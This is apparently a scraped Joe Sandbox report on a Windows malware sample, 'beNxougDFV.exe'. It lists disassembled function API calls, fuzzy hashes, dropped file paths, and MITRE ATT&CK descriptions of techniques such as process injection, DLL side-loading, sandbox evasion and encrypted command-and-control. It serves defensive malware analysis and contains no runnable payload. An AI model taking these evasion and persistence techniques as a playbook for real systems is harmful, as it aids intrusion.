Associated: 00000000.00000002.1390064349.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390185529.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_beNxougDFV.jbxd

Similarity

API ID: Close$Enum
String ID:
API String ID: 464197530-0
Opcode ID: 92a6906e664bbcb47ab1ca28fdd4f13aa4067a21e5a0486ffc58b8f5881c376e
Instruction ID: 05bed6b59ed8188e40eca3efb14264cb36eb805b2849730c7d7757a09cb5f5a9
Opcode Fuzzy Hash: 92a6906e664bbcb47ab1ca28fdd4f13aa4067a21e5a0486ffc58b8f5881c376e
Instruction Fuzzy Hash: BC115B32504119FBEF01AF51CE09B9E7B7AEF14351F104072BA05B50E0E7B5EE52AA68

Function 00405960 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 41COMMON

Download Yara Rule

APIs

CharNextA.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsw599B.tmp,?,004059CC,C:\Users\user\AppData\Local\Temp\nsw599B.tmp,C:\Users\user\AppData\Local\Temp\nsw599B.tmp,774D3410,?,C:\Users\user\AppData\Local\Temp\,00405717,?,774D3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 0040596E
CharNextA.USER32(00000000), ref: 00405973
CharNextA.USER32(00000000), ref: 00405987

Strings

C:\Users\user\AppData\Local\Temp\nsw599B.tmp, xrefs: 00405961

Memory Dump Source

Source File: 00000000.00000002.1390012497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1389993034.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390064349.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390185529.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_beNxougDFV.jbxd

Similarity

API ID: CharNext
String ID: C:\Users\user\AppData\Local\Temp\nsw599B.tmp
API String ID: 3213498283-160415898
Opcode ID: 78caeea6086e6eed9a212387893711d8897386d9b52ffe3bd3d136e2934aa6d1
Instruction ID: 9bd73c2178bbc4ada55c293d8cea80d9ef0b2d457d60247f238fee92507865f8
Opcode Fuzzy Hash: 78caeea6086e6eed9a212387893711d8897386d9b52ffe3bd3d136e2934aa6d1
Instruction Fuzzy Hash: CDF096D1904F60AEFB3252684C44B779F89CB56771F18447BE940B62C1C27C48418FEB

Function 00402CE4 Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000,00000000,00402EC4,00000001), ref: 00402CF7
GetTickCount.KERNEL32 ref: 00402D15
CreateDialogParamA.USER32(0000006F,00000000,00402C61,00000000), ref: 00402D32
ShowWindow.USER32(00000000,00000005), ref: 00402D40

Memory Dump Source

Source File: 00000000.00000002.1390012497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1389993034.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390064349.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390185529.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_beNxougDFV.jbxd

Similarity

API ID: Window$CountCreateDestroyDialogParamShowTick
String ID:
API String ID: 2102729457-0
Opcode ID: f4337ae7c9a0c2b393fe5f11cb57febad8f5df9eb2ad2e71e21657c922240b80
Instruction ID: 46e63a0393c595c386a212d898ebec3da19c13aa57c3e66a4565427f31a4a510
Opcode Fuzzy Hash: f4337ae7c9a0c2b393fe5f11cb57febad8f5df9eb2ad2e71e21657c922240b80
Instruction Fuzzy Hash: 09F05E70906221ABDA207F20BE4CACA7BA4FB45B527024576F445B11E4C779888ACBDD

Function 00404FCA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 00404FF9
CallWindowProcA.USER32(?,?,?,?), ref: 0040504A

Part of subcall function 0040403C: SendMessageA.USER32(00010460,00000000,00000000,00000000), ref: 0040404E

Strings

, xrefs: 00404FDA

Memory Dump Source

Source File: 00000000.00000002.1390012497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1389993034.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390064349.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390185529.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_beNxougDFV.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: e712e2a543f08d2e54f60ba561f502afcf318598cb166087ec4cd0ddecdd3944
Instruction ID: a223dd13e6372a4dd0479c59c93eb21e0d8a99a0ac54a5c20384062b78d82a0f
Opcode Fuzzy Hash: e712e2a543f08d2e54f60ba561f502afcf318598cb166087ec4cd0ddecdd3944
Instruction Fuzzy Hash: F1017171104609EBEF205F51DD81A9F3A29EB84795F204037FA01B62D1D77A8C51AAAE

Function 004036EA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,774D3410,00000000,C:\Users\user\AppData\Local\Temp\,004036C2,004034DC,?,?,00000006,00000008,0000000A), ref: 00403704
GlobalFree.KERNEL32(00000000), ref: 0040370B

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 004036EA

Memory Dump Source

Source File: 00000000.00000002.1390012497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1389993034.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390064349.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390185529.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_beNxougDFV.jbxd

Similarity

API ID: Free$GlobalLibrary
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 1100898210-2145255484
Opcode ID: 35d1f02da0abf4a3a5ea65bd0cdd12c9264502c99e7b9c945f64e5a7c8fdc6a2
Instruction ID: b677e6ccb62fb367f72670c3ce7c034f3dd0af87a7da7d41c05298a088c6e355
Opcode Fuzzy Hash: 35d1f02da0abf4a3a5ea65bd0cdd12c9264502c99e7b9c945f64e5a7c8fdc6a2
Instruction Fuzzy Hash: C6E01233815121ABC7356F5BED04B5A77687F45B22F058466EC407B3A0CB746C418FD9

Function 0040590E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402DB4,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\beNxougDFV.exe,C:\Users\user\Desktop\beNxougDFV.exe,80000000,00000003), ref: 00405914
CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402DB4,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\beNxougDFV.exe,C:\Users\user\Desktop\beNxougDFV.exe,80000000,00000003), ref: 00405922

Strings

C:\Users\user\Desktop, xrefs: 0040590E

Memory Dump Source

Source File: 00000000.00000002.1390012497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1389993034.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390064349.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390185529.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_beNxougDFV.jbxd

Similarity

API ID: CharPrevlstrlen
String ID: C:\Users\user\Desktop
API String ID: 2709904686-3080008178
Opcode ID: 714da30cf500cccbdd7b4a4277d37f3a4e299a669b52a45b343dae58782ad56f
Instruction ID: 79756b3271e31ddeb9bc27b600d1c90533e2d507c88bbc01e3e6e8e0ac64b055
Opcode Fuzzy Hash: 714da30cf500cccbdd7b4a4277d37f3a4e299a669b52a45b343dae58782ad56f
Instruction Fuzzy Hash: 1BD0C7B2419D706EE34373559C04B9F6A49DF56750F0904A2E140A61D1C67C5D414BAD

Function 00405A2D Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405C88,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405A3D
lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405A55
CharNextA.USER32(00000000,?,00000000,00405C88,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405A66
lstrlenA.KERNEL32(00000000,?,00000000,00405C88,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405A6F

Memory Dump Source

Source File: 00000000.00000002.1390012497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1389993034.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390064349.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390185529.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_beNxougDFV.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: 57b21f4120e00b08a3941e9ed4e610408d9ca53935617fe6296070accebd3829
Instruction ID: 6224e523b18aba5be362eaca93d7d04149ef311f73b073555fcbd801f46ec3cb
Opcode Fuzzy Hash: 57b21f4120e00b08a3941e9ed4e610408d9ca53935617fe6296070accebd3829
Instruction Fuzzy Hash: 68F0C232604458AFC712DBA4CC40D9EBBA8EF46350B2541A5E800F7251D234EE019FA9

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via Network Device CLI (e.g. `reload` ).
Tactics:	Impact
Data Sources:	Command: Command Execution, Process: Process Creation, Sensor Health: Host Status
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report beNxougDFV.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_g5zre3fi.bh5.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_h3gfk5d3.0e2.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_o3fbgsc4.wim.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_w5zjanck.2qu.ps1

C:\Users\user\AppData\Local\Temp\nsw599B.tmp\Banner.dll

C:\Users\user\AppData\Local\Temp\nsw599B.tmp\UserInfo.dll

C:\Users\user\AppData\Local\unshabbily\Loggie.Nav

C:\Users\user\AppData\Local\unshabbily\Specialeffektens.San246

C:\Users\user\AppData\Local\unshabbily\beNxougDFV.exe

C:\Users\user\AppData\Local\unshabbily\beNxougDFV.exe:Zone.Identifier

C:\Users\user\AppData\Local\unshabbily\dicyclopentadienyliron.skr

C:\Users\user\AppData\Local\unshabbily\fjernkontrollers.hid

C:\Users\user\AppData\Local\unshabbily\irresolubleness.hje

Static File Info

General

File Icon

Static PE Info

General

Windows Analysis Report
beNxougDFV.exe

Function 004031BB Relevance: 91.4, APIs: 33, Strings: 19, Instructions: 368
stringcomfileCOMMON

Function 00405194 Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 282
windowclipboardmemoryCOMMON

Function 004056F7 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 159
filestringCOMMON

Function 004065BB Relevance: 5.4, APIs: 4, Instructions: 382
COMMON

Function 00403B1C Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 346
windowstringCOMMON

Function 0040377F Relevance: 47.5, APIs: 13, Strings: 14, Instructions: 215
stringregistryCOMMON

Function 00402D48 Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 182
COMMON

Function 00405F51 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 199
stringCOMMON

Function 00401759 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 147
stringtimeCOMMON

Function 00405056 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 73
stringwindowCOMMON

Function 0040551C Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 39
COMMON

Function 00406259 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36
libraryCOMMON

Function 00402F81 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 155
COMMON

Function 00405AF7 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 33
COMMON

Function 00401FFD Relevance: 6.1, APIs: 4, Instructions: 73
libraryloaderCOMMON